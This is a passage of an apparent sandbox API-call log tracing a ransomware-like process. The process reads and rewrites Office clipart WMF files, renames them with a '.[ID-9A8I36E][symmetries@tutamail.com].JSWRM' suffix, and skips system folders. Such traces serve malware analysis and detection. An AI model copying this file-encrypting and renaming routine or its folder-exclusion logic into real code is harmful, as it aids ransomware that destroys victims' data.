lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0076.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.136] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0076.136] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0076.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0076.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0076.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0076.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0076.136] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00437_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00437_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00437_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00437_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.137] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0076.137] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0076.137] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0076.137] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd76a969, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd76a969, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd76a969, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb88, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="DD00448_.WMF", cAlternateFileName="")) returned 1 [0076.137] lstrcmpiW (lpString1="DD00448_.WMF", lpString2=".") returned 1 [0076.137] lstrcmpiW (lpString1="DD00448_.WMF", lpString2="..") returned 1 [0076.137] lstrcmpiW (lpString1="DD00448_.WMF", lpString2="...") returned 1 [0076.137] lstrcmpiW (lpString1="DD00448_.WMF", lpString2="windows") returned -1 [0076.137] lstrcmpiW (lpString1="DD00448_.WMF", lpString2="recovery") returned -1 [0076.137] lstrcmpiW (lpString1="DD00448_.WMF", lpString2="perflogs") returned -1 [0076.137] lstrcmpiW (lpString1="DD00448_.WMF", lpString2="documents and settings") returned -1 [0076.137] lstrcmpiW (lpString1="DD00448_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.137] lstrcmpiW (lpString1="DD00448_.WMF", lpString2="system volume information") returned -1 [0076.137] lstrcmpiW (lpString1="DD00448_.WMF", lpString2="msocache") returned -1 [0076.137] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0076.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00448_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00448_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD00448_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.137] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0076.137] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0076.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00448_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00448_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD00448_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.137] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0076.137] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0076.137] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0076.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.137] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0076.137] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00448_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00448_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0076.138] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2952) returned 1 [0076.138] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.138] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb80) returned 0x24c1d0 [0076.138] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xb80, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0xb80, lpOverlapped=0x0) returned 1 [0076.141] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.141] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xb80, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0xb80, lpOverlapped=0x0) returned 1 [0076.141] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0076.142] CloseHandle (hObject=0x460) returned 1 [0076.142] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0076.142] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.142] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.142] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.142] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0076.142] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.142] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.142] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0076.142] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.142] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0076.142] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0076.142] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0076.142] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0076.142] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0076.142] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00448_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00448_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00448_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00448_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.142] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0076.143] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0076.143] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0076.143] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd76a969, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd76a969, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd790bed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2708, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="DD00449_.WMF", cAlternateFileName="")) returned 1 [0076.143] lstrcmpiW (lpString1="DD00449_.WMF", lpString2=".") returned 1 [0076.143] lstrcmpiW (lpString1="DD00449_.WMF", lpString2="..") returned 1 [0076.143] lstrcmpiW (lpString1="DD00449_.WMF", lpString2="...") returned 1 [0076.143] lstrcmpiW (lpString1="DD00449_.WMF", lpString2="windows") returned -1 [0076.143] lstrcmpiW (lpString1="DD00449_.WMF", lpString2="recovery") returned -1 [0076.143] lstrcmpiW (lpString1="DD00449_.WMF", lpString2="perflogs") returned -1 [0076.143] lstrcmpiW (lpString1="DD00449_.WMF", lpString2="documents and settings") returned -1 [0076.143] lstrcmpiW (lpString1="DD00449_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.143] lstrcmpiW (lpString1="DD00449_.WMF", lpString2="system volume information") returned -1 [0076.143] lstrcmpiW (lpString1="DD00449_.WMF", lpString2="msocache") returned -1 [0076.143] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0076.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00449_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00449_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD00449_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.143] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0076.143] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0076.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00449_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00449_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD00449_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.143] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0076.143] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0076.143] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0076.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.143] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0076.143] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00449_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00449_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0076.143] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9992) returned 1 [0076.144] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.144] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2700) returned 0x24c1d0 [0076.144] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2700, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x2700, lpOverlapped=0x0) returned 1 [0076.146] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.146] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2700, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x2700, lpOverlapped=0x0) returned 1 [0076.146] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0076.146] CloseHandle (hObject=0x460) returned 1 [0076.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0076.146] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0076.146] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.146] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0076.146] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0076.146] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.146] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0076.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0076.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0076.146] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0076.146] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.146] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00449_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00449_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00449_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00449_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.150] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0076.150] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0076.150] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0076.150] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd76a969, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd76a969, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd790bed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5130, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="DD00687_.WMF", cAlternateFileName="")) returned 1 [0076.150] lstrcmpiW (lpString1="DD00687_.WMF", lpString2=".") returned 1 [0076.150] lstrcmpiW (lpString1="DD00687_.WMF", lpString2="..") returned 1 [0076.150] lstrcmpiW (lpString1="DD00687_.WMF", lpString2="...") returned 1 [0076.150] lstrcmpiW (lpString1="DD00687_.WMF", lpString2="windows") returned -1 [0076.150] lstrcmpiW (lpString1="DD00687_.WMF", lpString2="recovery") returned -1 [0076.150] lstrcmpiW (lpString1="DD00687_.WMF", lpString2="perflogs") returned -1 [0076.150] lstrcmpiW (lpString1="DD00687_.WMF", lpString2="documents and settings") returned -1 [0076.150] lstrcmpiW (lpString1="DD00687_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.151] lstrcmpiW (lpString1="DD00687_.WMF", lpString2="system volume information") returned -1 [0076.151] lstrcmpiW (lpString1="DD00687_.WMF", lpString2="msocache") returned -1 [0076.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0076.151] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00687_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.151] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00687_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD00687_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0076.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0076.151] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00687_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.151] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00687_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD00687_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0076.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0076.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0076.151] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.151] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0076.151] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00687_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00687_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0076.151] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=20784) returned 1 [0076.151] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5130) returned 0x24c1d0 [0076.151] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5130, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x5130, lpOverlapped=0x0) returned 1 [0076.202] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.202] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5130, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x5130, lpOverlapped=0x0) returned 1 [0076.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0076.202] CloseHandle (hObject=0x460) returned 1 [0076.202] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0076.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.202] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.202] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0076.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.202] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0076.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0076.202] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0076.202] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0076.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0076.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0076.202] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00687_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00687_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00687_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00687_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.206] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0076.206] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: 